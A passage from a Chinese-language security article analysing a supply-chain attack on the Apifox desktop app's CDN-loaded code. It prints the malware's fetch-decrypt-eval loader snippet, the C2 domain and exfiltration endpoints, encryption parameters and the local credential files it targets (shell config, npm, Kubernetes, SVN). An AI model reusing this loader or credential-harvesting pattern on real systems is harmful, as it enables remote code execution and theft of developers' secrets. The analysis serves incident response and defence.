center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">~/.zshrc</span></span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Shell 环境变量（可能含 API Key、Vault 地址）</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">~/.npmrc</span></span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Wayback Machine 抓取并存档投毒版本（77KB）</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">~/.kube/*</span></span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Kubernetes 集群配置（含 OIDC refresh token）</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">~/.subversion/*</span></span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">SVN 凭证</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="50.0000%" width="50.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">目录树遍历</span></p></div></div></td><td data-colwidth="49.8100%" width="49.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">主目录、桌面、文档目录结构（深度 1-2 层）</span></p></div></div></td></tr></tbody></table></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">C2 通信协议</span></strong></p></div></div></div></div><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">入口代码构造的自定义 HTTP 头：</span></p><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Header 字段</span></strong></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内容</span></strong></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">加密方式</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">af_uuid</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">机器指纹 SHA-256</span></p></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">明文</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">af_os</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">操作系统类型 + 版本号</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">明文</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">af_user</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">用户主目录路径</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">RSA-2048 OAEP</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">af_name</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">主机名</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">RSA-2048 OAEP</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">af_apifox_user</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apifox 账户邮箱</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">RSA-2048 OAEP</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">af_apifox_name</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apifox 账户姓名</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">RSA-2048 OAEP</span></p></div></div></td></tr></tbody></table></p></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">机器指纹生成逻辑：</span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">MAC地址 + CPU型号 + 主机名 + 用户主目录 + 操作系统平台 → SHA-256 哈希 → 64字符十六进制</span></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apifox 用户凭证窃取：恶意代码从 localStorage 读取 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">common.accessToken</span></span><span leaf="">（Apifox 登录令牌），调用官方 API </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">GET <a href="https://api.apifox.com/api/v1/user" target="_blank">https://api.apifox.com/api/v1/user</a></span></span><span leaf=""> 获取用户信息。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">远程代码执行机制：</span></p></div><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__title">JavaScript</span></span></code><br/><code><span leaf=""><span class="code-snippet__keyword">const</span> r = <span class="code-snippet__keyword">await</span> <span class="code-snippet__title">fetch</span>(<span class="code-snippet__variable">REMOTE_JS_URL</span>, { <span class="code-snippet__attr">headers</span>: h });</span></code><br/><code><span leaf=""><span class="code-snippet__keyword">const</span> payload = (<span class="code-snippet__keyword">await</span> r.<span class="code-snippet__title">text</span>()).<span class="code-snippet__title">trim</span>();</span></code><br/><code><span leaf=""><span class="code-snippet__keyword">const</span> code = <span class="code-snippet__title">rsaDecrypt</span>(payload);</span></code><br/><code><span leaf=""><span class="code-snippet__built_in">eval</span>(code); <span class="code-snippet__comment">// 任意远程代码执行</span></span></code><br/></pre></p><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">C2 域名设计</span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者使用的 C2 域名 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">apifox.it.com</span></span><span leaf=""> 极具迷惑性：</span></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">.it.com</span></span><span leaf=""> 并非意大利国别域名 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">.it </span></span><span leaf="">的子域，而是商业二级域名服务</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">不受 ICANN 标准监管约束，无公开 WHOIS 信息，溯源困难</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">容易被误认为是 Apifox 的内部测试域或官方子产品域</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">C2 技术栈：</span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">nginx/1.28.2 + Express (Node.js)</span></span><span leaf="">，具有 Stage-2 路径动态生成、一次性 URL、CORS 全开、无缓存、持续迭代攻击载荷（v1 → v2）等特征。观测到的 Stage-2 URL 样本包括 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">/49b5e0ba.js</span></span><span leaf="">、</span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">/69bd75f5.js</span></span><span leaf="">、</span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">/bf0475de.js</span></span><span leaf=""> 等至少 10 个不同路径，在 2026-03-25 验证时均已返回 404。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">官方公告提到的&#34;概率性触发&#34;实际上是</span><strong style="box-sizing: border-box;"><span leaf="">服务端控制的灵活 C2 平台</span></strong><span leaf="">：C2 可以根据机器指纹选择性下发载荷（空响应忽略低价值目标，定制化载荷攻击高价值目标）。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">数据外泄方式</span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">窃取的数据经过以下处理后上传：</span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">原始 JSON → Gzip 压缩 → AES-256-GCM 加密 → Base64 编码 → POST 上传</span></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AES 加密参数：</span></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">密码：</span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">apifox</span></span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">盐值：</span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">foxapi</span></span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">密钥派生：</span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">scryptSync(password, salt, 32)</span></span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">IV：12 字节随机值</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">格式：</span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">Base64(IV[12] + AuthTag[16] + CipherText)</span></span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">上传端点：</span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf=""><a href="https://apifox.it.com/event/0/log" target="_blank">https://apifox.it.com/event/0/log</a></span></span><span leaf="">（v1）、</span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf=""><a href="https://apifox.it.com/event/2/log" target="_blank">https://apifox.it.com/event/2/log</a></span></span><span leaf="">（v2）</span></p></li></ul></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">为什么攻击能成功</span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">APIFox 的 Electron 应用存在三个安全配置缺陷：</span></p><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">在线动态加载外部 JavaScript：</span></strong><span leaf="">从公网 CDN 加载代码而非本地打包，CDN 被劫持即可影响所有用户</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Electron sandbox 未启用：</span></strong><span leaf="">渲染进程中的 JavaScript 可直接访问文件系统</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Node.js API 暴露：</span></strong><span leaf="">nodeIntegration 启用，恶意代码可直接使用 require(&#39;fs&#39;) 等 Node API</span></p></li></ol><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这三个缺陷叠加，攻击者无需漏洞利用，仅通过 CDN 投毒就能读取用户本地任意文件。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">未捕获的后续阶段</span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">目前捕获到的 Stage-2 v1 和 v2 仅是前期侦察和凭据采集阶段。从架构设计来看，每次轮询 C2 都可以下发完全不同的载荷。潜在的后续阶段包括：高价值目标筛选（根据 SSH 密钥目标服务器、K8s 配置集群规模、Apifox 邮箱所属公司）、定制化攻击载荷、独立后门植入、SSH 横向移动、K8s OIDC Token 接管集群、npm/Git Token 二次供应链投毒等。</span></p><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">04 思考总结</span></span></strong></p></div></div></div></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">与 LiteLLM 投毒的对比</span></strong></p></div></div></div></div><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年3月早些时候，LiteLLM 库也遭遇供应链投毒。两起事件形成互补：</span></p><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">维度</span></b></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 